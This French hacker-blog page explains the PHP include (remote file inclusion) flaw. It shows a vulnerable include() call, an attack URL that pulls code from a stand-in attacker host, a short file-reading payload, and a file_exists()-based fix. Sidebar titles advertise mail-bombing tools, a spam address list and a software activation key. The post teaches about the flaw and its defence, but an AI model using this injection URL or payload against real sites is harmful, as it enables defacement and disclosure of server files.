Post Populaire

  • Géo-localiser vos Contacts
    Géo-localiser vos Contacts Aujourd’hui nous allons voir comment géolocaliser les adresses d’une liste de contacts et les projeter sur un...
  • Tuto Resource-Hacker
    Resource Hacker est un outil petit mais excellent pour modifier les fichiers système comme DLL, EXE, CPL, etc Vous pouvez même changer en...
  • Meziamus.com ou le forum de l'arnaque !
    Nous savions tous déjà que ce forum administrer par Méziane Allali dit "Méziamus" n'a été créer que dans un seul but, pi...
  • Téléchargement Sebdelkil
    Blackbuntu Blackbuntu est la distribution des tests de pénétration qui a été spécialement conçu pour la formation d'étudiants et de p...
  • Clé d'activation TuneUp Utilities 2014
    Clé d'activation TuneUp Utilities 2014 Ce logiciel est reconnu meilleur logiciel de l'année 2013 a titre d'optimisation...
  • Listing d'adresse mail
    Listing d'adresse mail Voila un type de listing de 10 000 adresse mail, j'ai dégoter cette mail-liste employer par des spam...
  • Tuto jbonblanc
    Jbonblanc c'est quoi ? C'est un logiciel qui vous permet d'envoyer des mails par un serveur smtp. Un serveur smtp c'est ...
  • l'anonymat sur internet
    l'anonyat sur internet: 1.Le serveur proxy anonyme étranger gratuit :   Voici des adresses ou vous trouverez ...
  • Mail-bombing
    Voici une petite collection de bomber sélectionner par SEBDELKIL,  certain sont vieux d'autres pas très efficace, d'autres très bo...

La faille include


Dans la programmation PHP, include() permet l'insertion de fichiers directement dans une page.

La plupart du temps, le fichier qui sera appellé est défini dans la chaîne de requête qui appellera la page.

- Un exemple concret :
Voici le code qui apparaitra dans le centre de la page index.php :
<?php include($fichier) ?>

Voici maintenant un exemple d'URL exploitant ce code et appelant index.php :
http://www.victime.net/index.php?fichier=accueil.php

A partir de cet URL, la page accueil.php apparaitra donc au centre de la page index.php.

Imaginons maintenant que détourniez ce script :
http://www.victime.net/index.php?fichier=http://www.hackeur.net/tmor.php

La page tmor.php contenant un code ordonnant d'écrire par exemple "Fuck you" en énorme sur la page index.php.
Le pirate a donc réussit à faire exécuter le code contenu dans la page tmor.php de son propre site dans le site www.victime.net.
Ce code ordonnant de réécrire la page index.php du site, affiche ce qu'il veut sur la page index de la victime. Et cela durablement, jusqu'à ce que le webmaster s'en rende compte.
On dit alors qu'il a déffacé la page.

A partir de là, maintes possibilités sont à porté de main, comme par exemple l'affichage de la page php elle-même.
Si tmor.php contenait cela, ce serait possible :
<?php
$inF = fopen($file, "r");
$j="";
while (!feof($inF)) {
$j=$j.fgets($inF, 4096)."<br> ";
}
$j='<font color="#000">'.$j.'</font>';
echo $j;
fclose($inF);
?>

C'est d'ailleurs le seul code que je donnerais ici :).

- Comment sécuriser cette faille ?
Pour cela, il existe maintes solutions mais nous n'en retiendront qu'une, la plus sûre.
PHP propose dans sa bibliothèque une fonction file_exists() qui permet de vérifier l'existence d'un fichier sur le serveur préssent. Il est donc impossible d'appeller une page se trouvant sur un serveur distant : 
<?php
if(!file_exists($fichier . ".php")) {
$fichier = "404";
}
?>

Ce code vérifie l'existence du fichier définit dans la variable $fichier et affiche la page 404.php si elle n'existe pas sur le serveur.

Vous remarquerez que ce code ajoute ".php" à la variable $fichier et dispense la page 404.php de son extension.
En fait, il est également préférable de ne pas faire apparaitre l'extension de la page à inclure dans l'URL :
http://www.victime.net/index.php?fichier=accueil

Du coup, include() se définira comme ceci :
<?php include($fichier . ".php") ?>

Utilisez ces codes et adaptez-les à votre situation.

Rechercher dans ce blog

Nombre d'articles

Hé bein ... déjà 871 articles publiés sur le site sebdelkil...

Fouiller dedans...

Un Nuage en Flash par Le Blogger

Formulaire de contact

Nom

E-mail *

Message *

/* Contains the "Load More Posts" functionality */ jQuery( document ).ready( function( $ ) { var next_page = parseInt( ronalfy_load_more.current_page ) + 1; var max_pages = parseInt( ronalfy_load_more.max_pages ); if ( next_page <= max_pages ) { $navi = $( '#content .paging-navigation' ); $navi .html( '
' +'' ); } else{ console.log(next_page+';'+max_pages) } var mt_ajax_load_posts = function() { //Begin Ajax data = { action: 'load_posts', next_page: next_page }; if( typeof $globalcat != 'undefined' ){ data.cat = $globalcat; } $.post( ronalfy_load_more.ajaxurl, data, function( response ) { next_page = response.next_page; max_pages = response.max_pages; //Append the HTML var html = $.parseHTML( response.html ); //html = $( html ).filter( '.type-post' ); //console.log('dodajemo gore'); $('#content section.post-item:last').after(html); //If the next page exceeds the number of pages available, get rid of the navigation if ( next_page > max_pages ) { $( '.paging-navigation' ).html( '' ); } //Fade out loading img and fade in loading text $( '.load_more' ).html('Load More'); }, 'json' ); }; //Clicking the load more button $( '.paging-navigation' ).on( 'click', '.load_more', function( e ) { e.preventDefault(); $( '.load_more' ).html('Loading...'); mt_ajax_load_posts(); } ); } );

- sebdelkil 2009-2015 - Aucun droit réservé -